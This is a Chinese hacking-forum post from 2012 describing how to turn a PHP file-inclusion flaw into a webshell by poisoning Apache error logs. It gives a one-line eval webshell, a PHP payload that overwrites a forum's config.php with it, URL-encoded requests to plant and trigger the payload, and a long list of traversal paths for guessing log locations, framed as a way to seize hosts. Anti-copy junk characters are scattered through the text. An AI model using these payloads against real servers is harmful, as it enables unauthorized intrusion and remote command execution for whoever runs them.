找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2048|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
& n0 G; t# E1 w+ F2 `
5 B' c+ m# z- i4 J' b% t/ o; ?比如还是这句一句话木马 : t5 ^' d" t- F
<?eval($_POST[cmd]);?>   
/ S# q) ^) f$ _' M
/ k- f# [1 l) l1 ^+ {到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, , D4 {0 L1 Z" Y! i3 c- O* ^( O3 q4 O( F
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 8 l/ c4 O. P9 @, `! n0 n) [0 K) a

. V6 [6 G3 i3 C5 e0 K<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); 3 x6 k' l+ f- Y
fclose($fp);?>   //在config.php里写入一句木马语句
) q4 m; c5 J9 u% r4 {4 G! @
  j& z4 @6 l9 D, |! w% N4 Z我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
% k* D' a" N3 Q5 D4 d& ?' u转换为 + ]1 }) _% T& j+ @& x" Y
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
+ ]! b( N8 O! z' C* @config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
) ~' a$ R1 W/ S$ v" _- g; j%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
& H* S% ?* z& n0 T9 ffclose%28%24fp%29%3B%3F%3E
( y# ^, G4 _; j/ T9 F我们提交 4 V0 H  V& H6 n% w4 p- a
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
$ J6 |% v1 b/ _' h' X%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 6 i0 ~% @& w/ C' u/ g; {# k
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
* i: V2 A# q# Xcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E ) G+ u% {. g+ [9 _7 S

$ X6 }% o, d! D' i这样就错误日志里就记录下了这行写入webshell的代码。 : _8 }6 B! [* p7 @+ W4 ~9 k
我们再来包含日志,提交
" S' |  h! C, G. v8 dhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log ' N5 S: B# i* z' ^0 ]
3 V4 I8 @4 r7 [& j+ f
这样webshell就写入成功了,config.php里就写入一句木马语句
7 L9 k6 \; ?0 I! @0 G1 KOK.
+ p4 l/ r; k  c2 g  K1 Mhttp://www.xxx.com/forum/config.php这个就成了我们的webshell
% @4 \" N0 z+ M$ G直接用lanker的客户端一连,主机就是你的了。 4 N( h( Q# z# W: O3 b( m
, K5 N3 c. Y& f: k7 G
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 * a/ b" Y% Q4 _! P- M, X4 m
& ~, F" ]' K. u- X
其他的日志路径,你可以去猜,也可以参照这里。
, }$ a, r) C0 ^, {! t2 }! Z! r% S& v../../../../../../../../../../var/log/httpd/access_log
# A/ i6 D1 i7 w+ n../../../../../../../../../../var/log/httpd/error_log 5 |( @  h, m9 B, a4 y. b
../apache/logs/error.log
. D7 u3 z8 N' G5 S1 |, H../apache/logs/access.log # y% ^2 [7 k3 B% m( }
../../apache/logs/error.log
' x3 b1 m: M/ R4 E& H( a../../apache/logs/access.log ( H7 H& ]1 u: |/ X! w( v% X$ M1 b
../../../apache/logs/error.log
0 a' ]* r$ r- u& d5 {../../../apache/logs/access.log ( R7 a5 M) U5 X. }# J2 |9 C
../../../../../../../../../../etc/httpd/logs/acces_log 8 g( s- g7 S5 J3 u  i2 \
../../../../../../../../../../etc/httpd/logs/acces.log 0 x* ?- |% T& m! R- W/ o3 ~* S
../../../../../../../../../../etc/httpd/logs/error_log ) o. R4 n8 m# P& r
../../../../../../../../../../etc/httpd/logs/error.log 3 X2 \( a- _! v1 J- Z) b- C
../../../../../../../../../../var/www/logs/access_log 1 K6 c3 ~: n/ p1 B
../../../../../../../../../../var/www/logs/access.log
, @( N% [$ y: O" [% l../../../../../../../../../../usr/local/apache/logs/access_log
. [4 M9 d% R) }' j* v& R/ r% C$ o  f../../../../../../../../../../usr/local/apache/logs/access.log ; N' P" J: P! R6 N1 H
../../../../../../../../../../var/log/apache/access_log
, V0 X$ J" Z' r' c. ~3 a../../../../../../../../../../var/log/apache/access.log 4 q( @9 {7 a5 s. E; o
../../../../../../../../../../var/log/access_log
" M* @6 H% ^, M5 |../../../../../../../../../../var/www/logs/error_log
3 q; I! ?; G" Z/ l7 j( U../../../../../../../../../../var/www/logs/error.log $ I& \7 K; g5 ^  A
../../../../../../../../../../usr/local/apache/logs/error_log
7 {% Y" K" @* J- X- _../../../../../../../../../../usr/local/apache/logs/error.log
: l+ C' ]7 e8 J! F9 w../../../../../../../../../../var/log/apache/error_log
9 h4 b# w/ |, ]3 E' O. Z3 C../../../../../../../../../../var/log/apache/error.log ' T, n& H, m4 s2 G1 t
../../../../../../../../../../var/log/access_log ' N# f" \$ {8 @7 \- f
../../../../../../../../../../var/log/error_log * D+ f+ l. T# S) i; d+ y0 C
/var/log/httpd/access_log       1 J6 q5 y% D$ \2 L- W& |9 W8 z' e
/var/log/httpd/error_log     
4 R  t( ?' D1 w! i' z../apache/logs/error.log     ; B* o; J( H5 |: l1 c  \
../apache/logs/access.log / H# W" S: Y$ c% I  o
../../apache/logs/error.log
$ [# I+ x% b7 p% Y  H+ P+ J8 a. t../../apache/logs/access.log ' S6 F4 a8 d$ b8 x
../../../apache/logs/error.log 1 o8 h0 e5 Z4 |* q
../../../apache/logs/access.log 4 E8 G3 I  t# f: j4 n
/etc/httpd/logs/acces_log
2 d, z3 d* [9 `5 L9 J" L/etc/httpd/logs/acces.log ' D; s9 O0 F' `) G3 j2 T
/etc/httpd/logs/error_log
, A: i" d( D/ x/etc/httpd/logs/error.log 8 E' e7 j# i6 {
/var/www/logs/access_log ' d, E9 y) ^" Z( [* E- p3 ?# j
/var/www/logs/access.log * _# j8 h" g% V7 O: }9 i! w- ]. i
/usr/local/apache/logs/access_log
5 G! x" w; o9 o9 p2 u7 b/usr/local/apache/logs/access.log
' W# f# Q* t& w* d* E  i$ p/var/log/apache/access_log
( g: Z( E. z. |& v3 ~/var/log/apache/access.log 9 d  d, _0 I3 T& k
/var/log/access_log 8 l, R' A( \. K
/var/www/logs/error_log
% d0 O; X: Q) n- l! z+ T5 K/var/www/logs/error.log 0 R' ?  ?0 i4 Q9 T+ m& T
/usr/local/apache/logs/error_log 2 i# E3 O' c) c0 s3 h$ Q
/usr/local/apache/logs/error.log . `7 X! I6 D: ?! N
/var/log/apache/error_log
: Y6 R1 G( C0 d' L' ]/var/log/apache/error.log
" A3 T9 g/ q$ x" W# m: L5 X/ j/var/log/access_log
! L5 Y) f% Y" V/ r/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表